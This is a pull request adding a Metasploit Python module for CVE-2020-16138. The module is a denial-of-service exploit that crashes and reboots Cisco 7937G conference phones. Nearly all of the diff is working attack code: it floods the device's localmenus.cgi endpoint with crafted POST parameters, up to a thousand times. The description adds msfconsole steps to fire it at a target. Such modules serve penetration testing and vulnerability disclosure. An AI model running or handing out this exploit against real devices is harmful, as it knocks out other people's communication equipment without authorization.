### PR TITLE
CVE-2020-16138

### DIFF
--- a/modules/auxiliary/dos/cisco/CVE-2020-16138.py
+++ b/modules/auxiliary/dos/cisco/CVE-2020-16138.py
@@ -1,0 +1,73 @@
+# Exploit Title: Cisco 7937G DoS 2 MSF Module
+# Date: 2020-08-10
+# Exploit Author: Cody Martin
+# Author Homepage: debifrank.github.io
+# Organization: BlackLanternSecurity
+# Org. Homepage: BlackLanternSecurity.com
+# Vendor Homepage: https://cisco.com
+# Version: <=SCCP-1-4-5-7
+# Tested On: SCCP-1-4-5-5, SIP-1-4-5-7
+# CVE: CVE-2020-16138
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+# standard modules
+import logging
+
+# extra modules
+dependencies_missing = False
+try:
+    import requests
+except ImportError:
+    dependencies_missing = True
+
+from metasploit import module
+
+
+metadata = {
+    'name': 'Cisco 7937G Denial-of-Service Reboot Attack',
+    'description': '''
+        DoS reset attack
+    ''',
+    'authors': [
+        'Cody Martin'
+    ],
+    'date': '2020-06-02',
+    'license': 'GPL_LICENSE',
+    'references': [
+        {'type': 'url', 'ref': '<url>'},
+        {'type': 'cve', 'ref': '2020-#'},
+        {'type': 'edb', 'ref': '#'}
+    ],
+    'type': 'dos',
+    'options': {
+        'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': 'None'}
+    }
+}
+
+
+def run(args):
+    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
+    if dependencies_missing:
+        logging.error('Module dependency (requests) is missing, cannot continue')
+        return
+
+    # Exploit
+    url = "http://{}/localmenus.cgi".format(args['rhost'])
+    data = "A"*46
+    payload = {"func": "609", "data": data, "rphl": "1"}
+    logging.info("FIRING ZE MIZZLES!")
+    for i in range(1000):
+        try:
+            r = requests.post(url=url, params=payload, timeout=5)
+            if r.status_code != 200:
+                logging.error("Device doesn't appear to be functioning or web access is not enabled.")
+                return
+        except requests.exceptions.RequestException:
+            logging.info('DoS reset attack completed!')
+            return
+
+
+if __name__ == '__main__':
+    module.run(metadata, run)


### PR DESCRIPTION
Python module targeting Cisco 7937G Conference Station.

This introduces a new python module targeting the Cisco 7937G Conference Station vulnerability identified as CVE-2020-16138.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/dos/cisco/CVE-2020-16138`
- [ ] `set RHOST 127.0.0.1`
- [ ] **Verify** `FIRING ZE MIZZLES!`
- [ ] **Verify** If device does not have Web Access enabled: `Device doesn't appear to be functioning or web access is not enabled.`
- [ ] **Verify** If device does have Web Access enabled: `DoS reset attack completed!`
- [ ] **Document** The vulnerability explanation is provided on our blog [here](https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/)

Our blog details how the vulnerabilities are exploited manually with video examples. If a demonstration of the execution of this module is needed it can be provided.